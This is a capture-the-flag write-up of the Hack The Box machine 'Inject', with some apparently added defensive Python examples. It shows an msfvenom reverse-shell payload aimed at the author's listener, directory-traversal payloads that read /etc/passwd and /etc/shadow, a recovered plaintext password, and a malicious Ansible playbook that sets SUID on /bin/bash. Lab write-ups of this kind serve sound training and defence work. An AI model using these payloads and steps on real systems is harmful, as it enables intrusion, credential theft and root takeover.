[Hack The Box] Inject [Writeup]
Introduction
Hello, I'm a useless pseudo-engineer.
This is my writeup for "Inject" on Hack The Box (see the link below).
Note that this article does not cover detailed usage of the tools involved.
Please do not misuse these techniques; use them only to contribute to society, since misuse is against the law.
Reconnaissance
Port scan
This time I tried a quick scan with RustScan.
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.204 --top --ulimit 5000
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
? https://admin.tryhackme.com
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.204:22
Open 10.10.11.204:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 07:22 EDT
Initiating Ping Scan at 07:22
Scanning 10.10.11.204 [4 ports]
Completed Ping Scan at 07:22, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:22
Completed Parallel DNS resolution of 1 host. at 07:22, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:22
Scanning 10.10.11.204 [2 ports]
Discovered open port 8080/tcp on 10.10.11.204
Discovered open port 22/tcp on 10.10.11.204
Completed SYN Stealth Scan at 07:22, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.204
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-03-17 07:22:16 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Enumeration
Exploring the website
Directory search
I used dirsearch to enumerate directories.
┌──(root㉿kali)-[~]
└─# dirsearch -u http://10.10.11.204:8080
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.11.204-8080/_23-03-17_07-23-22.txt
Error Log: /root/.dirsearch/logs/errors-23-03-17_07-23-22.log
Target: http://10.10.11.204:8080/
[07:23:22] Starting:
[07:23:47] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[07:23:49] 400 - 435B - /a%5c.aspx
[07:24:18] 200 - 5KB - /blogs
[07:24:29] 500 - 106B - /error
[07:24:30] 500 - 106B - /error/
[07:24:59] 200 - 6KB - /register
[07:25:10] 200 - 2KB - /upload
[07:25:10] 200 - 2KB - /upload/
Task Completed
Initial access
Reverse shell
I decided to try uploading a reverse-connect shell, and for now I created it as an ELF file.
┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f elf -o reverse.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: reverse.elf
Upload
Directory traversal attack
Fetch the payload list from the following location.
┌──(root㉿kali)-[~/work]
└─# wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Directory%20Traversal/Intruder/directory_traversal.txt
Let's give it a try!
┌──(root㉿kali)-[~/work]
└─# ffuf -w ./directory_traversal.txt:FUZZ -u http://10.10.11.204:8080/show_image?img=FUZZ -fc 500
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.204:8080/show_image?img=FUZZ
:: Wordlist : FUZZ: /root/work/directory_traversal.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 191ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 183ms]
* FUZZ: ../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 185ms]
* FUZZ: ../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 194ms]
* FUZZ: ../../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 199ms]
* FUZZ: ../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 251ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 181ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 184ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 228, Words: 23, Lines: 10, Duration: 183ms]
* FUZZ: ../../../../../../../../../../../../etc/hosts
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 191ms]
* FUZZ: ../../../../../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 199ms]
* FUZZ: /../../../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 195ms]
* FUZZ: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[Status: 200, Size: 1345, Words: 1, Lines: 1, Duration: 206ms]
* FUZZ: ../../../../../../../../../../../../etc/shadow
[Status: 200, Size: 1345, Words: 1, Lines: 1, Duration: 207ms]
* FUZZ: /../../../../../../../../../../etc/shadow
[Status: 200, Size: 1345, Words: 1, Lines: 1, Duration: 193ms]
* FUZZ: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
:: Progress: [140/140] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
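As an added example (not from the original writeup), here is the defensive side of the show_image?img= traversal probed above: a resolver that pins every requested name under a fixed image directory, and a scan that flags access-log requests the resolver would reject, including the %2e%2e%2f-encoded and double-encoded variants. The IMAGE_ROOT path and the log lines are constructed for this example.

```python
"""Defensive counterpart to the show_image?img= probing: a server-side
resolver that refuses any name escaping the image directory, and a log scan
that flags requests the resolver would reject (plain, %2e%2e%2f-encoded and
double-encoded traversal alike). IMAGE_ROOT and SAMPLE_LOG are constructed."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

IMAGE_ROOT = "/var/www/WebApp/src/main/uploads"   # assumed upload directory

# Apache/Tomcat style access-log line: client, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def safe_image_path(root, requested):
    """Return the absolute file path if it stays inside root, else None."""
    decoded = unquote(unquote(requested))          # undo single and double encoding
    if "\x00" in decoded:                          # NUL would truncate the name in C code
        return None
    # join() discards root when decoded is absolute; normpath collapses '..'
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if not candidate.startswith(root.rstrip("/") + "/"):
        return None                                # escaped root, or root itself
    return candidate


def scan_access_log(lines, root=IMAGE_ROOT, param="img"):
    """Return (client, status, decoded img value) for every request that escapes root."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in query.get(param, []):           # parse_qs already decoded once
            probe = value.replace("\\", "/")         # treat '\..\' probes as traversal too
            if safe_image_path(root, probe) is None:
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits


# Constructed sample traffic mirroring the ffuf run (not real box data)
SAMPLE_LOG = [
    '10.10.14.95 - - [17/Mar/2023:07:40:01 +0000] "GET /show_image?img=cat.jpg HTTP/1.1" 200 5120',
    '10.10.14.95 - - [17/Mar/2023:07:40:02 +0000] "GET /show_image?img=../../../../../../../../etc/passwd HTTP/1.1" 200 1986',
    '10.10.14.95 - - [17/Mar/2023:07:40:03 +0000] "GET /show_image?img=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 HTTP/1.1" 200 1986',
    '10.10.14.95 - - [17/Mar/2023:07:40:04 +0000] "GET /show_image?img=/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200 1345',
    '10.10.14.95 - - [17/Mar/2023:07:40:05 +0000] "GET /show_image?img=thumbs/../cat.jpg HTTP/1.1" 200 5120',
    '10.10.14.95 - - [17/Mar/2023:07:40:06 +0000] "GET /blogs HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for client, status, value in scan_access_log(SAMPLE_LOG):
        print(f"{client} status={status} traversal img={value!r}")
```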
<dependency>
  <groupId>org.springframework.cloud</groupId>
  <artifactId>spring-cloud-function-web</artifactId>
  <version>3.2.2</version>
</dependency>
So I did some investigating, and this is what turned up.
Here is the official article.
I'm going to attack CVE-2022-22963, a vulnerability from 2022.
We'll use the following PoC.
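As an added example rather than the PoC from the writeup, the following checks a pom.xml for the affected spring-cloud-function versions behind CVE-2022-22963, using the patched releases 3.1.7 and 3.2.3 named in the Spring advisory; the sample pom is constructed around the dependency block above.

```python
"""Supply-chain check for CVE-2022-22963: parse a Maven pom.xml, pick out
spring-cloud-function artifacts and report whether the declared version falls
in the affected range (3.1.6, 3.2.2 and older unsupported lines). The sample
pom below is constructed for this example."""
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}
# First patched release per supported minor line; older lines got no fix.
FIXED = {(3, 1): 7, (3, 2): 3}


def parse_version(text):
    """'3.2.2' -> (3, 2, 2); qualifiers such as '-SNAPSHOT' are ignored."""
    core = text.strip().split("-")[0]
    parts = []
    for piece in core.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable_scf(version):
    """True if this spring-cloud-function version is affected by CVE-2022-22963."""
    major, minor, patch = parse_version(version)
    line = (major, minor)
    if line in FIXED:
        return patch < FIXED[line]
    return line < (3, 1)      # unsupported 3.0.x / 2.x never received the fix


def scan_pom(pom_xml):
    """Return [(artifactId, version, vulnerable)] for each spring-cloud-function dependency;
    vulnerable is None when the version is a property or managed by a parent/BOM."""
    root = ET.fromstring(pom_xml)
    findings = []
    for dep in root.iterfind(".//m:dependency", NS):
        group = dep.findtext("m:groupId", default="", namespaces=NS).strip()
        artifact = dep.findtext("m:artifactId", default="", namespaces=NS).strip()
        version = dep.findtext("m:version", default="", namespaces=NS).strip()
        if group == "org.springframework.cloud" and artifact.startswith("spring-cloud-function"):
            known = bool(version) and not version.startswith("${")
            findings.append((artifact, version, is_vulnerable_scf(version) if known else None))
    return findings


# Constructed pom fragment containing the dependency block read off the box
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency>
      <groupId>org.springframework.cloud</groupId>
      <artifactId>spring-cloud-function-web</artifactId>
      <version>3.2.2</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <version>2.6.5</version>
    </dependency>
  </dependencies>
</project>
"""

if __name__ == "__main__":
    labels = {True: "AFFECTED by CVE-2022-22963", False: "ok", None: "version managed elsewhere"}
    for artifact, version, vulnerable in scan_pom(SAMPLE_POM):
        print(f"{artifact} {version or '?'}: {labels[vulnerable]}")
```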
Refer to my go-to site below to build the reverse shell command.
To catch the reverse shell, set up the listener first.
┌──(root㉿kali)-[~/work]
└─# nc -lnvp 4444
listening on [any] 4444 ...
Privilege escalation – lateral
First, let's look around from Frank's shell for anything worth noting.
┌──(root㉿kali)-[~/work]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.95] from (UNKNOWN) [10.10.11.204] 33128
whoami
frank
ls -lta
total 76
drwxrwxrwt 15 root root 12288 Mar 17 12:48 tmp
drwxr-xr-x 26 root root 780 Mar 17 11:20 run
drwxr-xr-x 19 root root 4040 Mar 17 11:20 dev
dr-xr-xr-x 13 root root 0 Mar 17 11:19 sys
dr-xr-xr-x 257 root root 0 Mar 17 11:19 proc
drwx------ 6 root staff 4096 Mar 6 13:15 root
drwxr-xr-x 4 root root 4096 Mar 6 11:43 boot
drwxr-xr-x 110 root root 4096 Mar 6 11:21 etc
drwxr-xr-x 4 root root 4096 Feb 1 18:38 home
drwxr-xr-x 2 root root 4096 Feb 1 18:38 mnt
drwxr-xr-x 18 root root 4096 Feb 1 18:38 .
drwxr-xr-x 18 root root 4096 Feb 1 18:38 ..
drwxr-xr-x 13 root root 4096 Feb 1 18:19 var
drwxr-xr-x 3 root root 4096 Oct 20 04:23 opt
drwx------ 2 root root 16384 Apr 8 2022 lost+found
drwxr-xr-x 14 root root 4096 Feb 23 2022 usr
drwxr-xr-x 2 root root 4096 Feb 23 2022 media
drwxr-xr-x 2 root root 4096 Feb 23 2022 srv
lrwxrwxrwx 1 root root 7 Feb 23 2022 bin -> usr/bin
lrwxrwxrwx 1 root root 7 Feb 23 2022 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 23 2022 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 23 2022 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 23 2022 libx32 -> usr/libx32
lrwxrwxrwx 1 root root 8 Feb 23 2022 sbin -> usr/sbin
cd /home/frank
ls -lta
total 28
drwx------ 2 frank frank 4096 Feb 1 18:38 .m2
drwxr-xr-x 3 frank frank 4096 Feb 1 18:38 .local
drwx------ 2 frank frank 4096 Feb 1 18:38 .cache
drwxr-xr-x 5 frank frank 4096 Feb 1 18:38 .
drwxr-xr-x 4 root root 4096 Feb 1 18:38 ..
lrwxrwxrwx 1 root root 9 Jan 24 13:57 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 3786 Apr 18 2022 .bashrc
-rw-r--r-- 1 frank frank 807 Feb 25 2020 .profile
I found a hidden .m2 directory, so let me look into it.
cd .m2
ls -lta
total 12
drwx------ 2 frank frank 4096 Feb 1 18:38 .
drwxr-xr-x 5 frank frank 4096 Feb 1 18:38 ..
-rw-r----- 1 root frank 617 Jan 31 16:55 settings.xml
cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<servers>
<server>
<id>Inject</id>
<username>phil</username>
<password>DocPhillovestoInject123</password>
<privateKey>${user.home}/.ssh/id_dsa</privateKey>
<filePermissions>660</filePermissions>
<directoryPermissions>660</directoryPermissions>
<configuration></configuration>
</server>
</servers>
</settings>
Since I found Phil's credentials, I tried logging in with them.
Incidentally, password login over SSH is refused, so run su - instead.
su - phil
DocPhillovestoInject123
ls -lta
total 16
drwxr-xr-x 6 frank frank 4096 Mar 17 12:55 frank
drwxr-xr-x 3 phil phil 4096 Feb 1 18:38 phil
drwxr-xr-x 4 root root 4096 Feb 1 18:38 .
drwxr-xr-x 18 root root 4096 Feb 1 18:38 ..
cd phil
ls -lta
total 24
-rw-r----- 1 root phil 33 Mar 17 11:20 user.txt
drwx------ 2 phil phil 4096 Feb 1 18:38 .cache
drwxr-xr-x 3 phil phil 4096 Feb 1 18:38 .
drwxr-xr-x 4 root root 4096 Feb 1 18:38 ..
lrwxrwxrwx 1 root root 9 Feb 1 07:40 .bash_history -> /dev/null
-rw-r--r-- 1 phil phil 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 phil phil 807 Feb 25 2020 .profile
whoami
phil
I'm now Phil. That gets the user flag!!! Since this shell is ugly, I'll upgrade it to an interactive one with Python.
python3 -c 'import pty; pty.spawn("bash")'
Privilege escalation – vertical
Investigation
Listing runnable sudo commands
First, use sudo -l to look for files and commands that might be runnable with privileges.
phil@inject:~$ sudo -l
[sudo] password for phil:
Sorry, user phil may not run sudo on localhost.
Nope.
linpeas -> /tmp
I decided to use the linpeas script; I prefer it over LinEnum.
Download linpeas.sh from the site below.
┌──(root㉿kali)-[~/work]
└─# wget https://github.com/carlospolop/PEASS-ng/releases/download/20230312/linpeas.sh
Run it.
phil@inject:/tmp$ chmod +x ./linpeas.sh
phil@inject:/tmp$ ./linpeas.sh
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...(omitted)
╔══════════╣ Executable files potentially added by user (limit 70)
2023-02-01+18:56:55.9583168900 /usr/local/sbin/laurel
2023-01-30+14:41:13.9270845020 /usr/local/bin/ansible-parallel
2022-04-08+08:30:24.8239423570 /etc/console-setup/cached_setup_terminal.sh
2022-04-08+08:30:24.8239423570 /etc/console-setup/cached_setup_keyboard.sh
2022-04-08+08:30:24.8239423570 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x 3 root root 4096 Oct 20 04:23 .
drwxr-xr-x 18 root root 4096 Feb 1 18:38 ..
drwxr-xr-x 3 root root 4096 Oct 20 04:23 automation
╔══════════╣ Unexpected in root
...(omitted)
I confirmed that there is a directory under /opt.
Let's gather more information.
Process monitoring
Get the pspy executable from the site below; download the 64-bit version.
┌──(root㉿kali)-[~/work]
└─# wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
Run it.
phil@inject:/tmp$ chmod +x ./pspy64
phil@inject:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/03/17 13:24:32 CMD: UID=0 PID=23786 | /lib/systemd/systemd-udevd
2023/03/17 13:24:32 CMD: UID=1001 PID=23779 | ./pspy64
2023/03/17 13:24:32 CMD: UID=1001 PID=23616 | -bash
2023/03/17 13:24:32 CMD: UID=0 PID=23613 | su - phil
2023/03/17 13:24:32 CMD: UID=0 PID=23486 |
2023/03/17 13:24:32 CMD: UID=0 PID=22695 |
2023/03/17 13:24:32 CMD: UID=0 PID=22160 |
2023/03/17 13:24:32 CMD: UID=0 PID=21900 |
2023/03/17 13:24:32 CMD: UID=0 PID=21622 |
...(omitted)
2023/03/17 13:27:49 CMD: UID=0 PID=23858 | sshd: [accepted]
2023/03/17 13:27:49 CMD: UID=113 PID=23859 | sshd: [net]
2023/03/17 13:27:56 CMD: UID=0 PID=23862 | sshd: [accepted]
2023/03/17 13:27:56 CMD: UID=0 PID=23861 | sshd: [accepted]
2023/03/17 13:27:56 CMD: UID=0 PID=23864 | sshd: [accepted]
2023/03/17 13:27:56 CMD: UID=113 PID=23865 | sshd: [net]
2023/03/17 13:27:56 CMD: UID=0 PID=23866 | /usr/sbin/sshd -D -R
2023/03/17 13:27:57 CMD: UID=113 PID=23867 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=0 PID=23868 | sshd: [accepted]
2023/03/17 13:27:57 CMD: UID=113 PID=23869 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=113 PID=23871 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=0 PID=23870 | sshd: [accepted]
2023/03/17 13:27:57 CMD: UID=0 PID=23872 | /usr/sbin/sshd -D -R
2023/03/17 13:27:57 CMD: UID=113 PID=23873 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=0 PID=23874 | /usr/sbin/sshd -D -R
2023/03/17 13:27:58 CMD: UID=113 PID=23875 | sshd: [net]
2023/03/17 13:28:01 CMD: UID=0 PID=23881 | sleep 10
2023/03/17 13:28:01 CMD: UID=0 PID=23880 | /usr/sbin/CRON -f
2023/03/17 13:28:01 CMD: UID=0 PID=23879 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
2023/03/17 13:28:01 CMD: UID=0 PID=23878 | /usr/sbin/CRON -f
2023/03/17 13:28:01 CMD: UID=0 PID=23877 | /usr/sbin/CRON -f
2023/03/17 13:28:01 CMD: UID=0 PID=23876 | /usr/sbin/CRON -f
2023/03/17 13:28:02 CMD: UID=0 PID=23884 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23883 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23885 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23887 | /bin/sh /sbin/ldconfig -p
2023/03/17 13:28:02 CMD: UID=0 PID=23888 |
2023/03/17 13:28:02 CMD: UID=0 PID=23889 |
2023/03/17 13:28:02 CMD: UID=0 PID=23891 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23892 |
2023/03/17 13:28:02 CMD: UID=0 PID=23893 | /bin/sh -c echo ~root && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23894 | /bin/sh -c echo ~root && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23895 |
2023/03/17 13:28:02 CMD: UID=0 PID=23896 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23899 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23897 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23901 | mkdir /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708
2023/03/17 13:28:02 CMD: UID=0 PID=23902 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23903 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23904 |
2023/03/17 13:28:03 CMD: UID=0 PID=23905 | /bin/sh -c /bin/sh -c 'chmod u+x /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/ /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py && sleep 0'
2023/03/17 13:28:03 CMD: UID=0 PID=23906 | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/ /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py && sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23907 | sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23908 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:03 CMD: UID=0 PID=23909 | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py && sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23910 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23911 | uname -p
2023/03/17 13:28:03 CMD: UID=0 PID=23912 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23913 | /usr/bin/python3 -Es /usr/bin/lsb_release -a
2023/03/17 13:28:03 CMD: UID=0 PID=23914 |
2023/03/17 13:28:03 CMD: UID=0 PID=23917 |
2023/03/17 13:28:03 CMD: UID=0 PID=23918 |
2023/03/17 13:28:03 CMD: UID=0 PID=23919 |
2023/03/17 13:28:03 CMD: UID=0 PID=23920 |
2023/03/17 13:28:03 CMD: UID=0 PID=23921 |
2023/03/17 13:28:03 CMD: UID=0 PID=23922 |
2023/03/17 13:28:03 CMD: UID=0 PID=23923 |
2023/03/17 13:28:03 CMD: UID=0 PID=23926 |
2023/03/17 13:28:03 CMD: UID=0 PID=23927 |
2023/03/17 13:28:03 CMD: UID=0 PID=23930 |
2023/03/17 13:28:03 CMD: UID=0 PID=23931 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23932 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23933 |
2023/03/17 13:28:03 CMD: UID=0 PID=23934 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23935 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23936 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23937 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23938 |
2023/03/17 13:28:03 CMD: UID=0 PID=23939 |
2023/03/17 13:28:03 CMD: UID=0 PID=23940 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23941 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
...(omitted)
playbook_1.yml is being executed; Ansible, the infrastructure automation tool, is running. Note the following command, which could let us create a malicious playbook.
2023/03/17 13:28:02 CMD: UID=0 PID=23883 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
Ansible is an automation tool.
Create the following playbook.yml:
- hosts: localhost
  tasks:
    - name: pre
      shell: "chmod +s /bin/bash"
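As an added example (not from the original writeup), the following audits the root cron command pspy captured above for paths a non-root user could write to, which is the condition that makes the playbook trick work. SAMPLE_FS replaces os.stat with constructed values, and the root:staff group-writable mode it assigns to /opt/automation/tasks is an assumption.

```python
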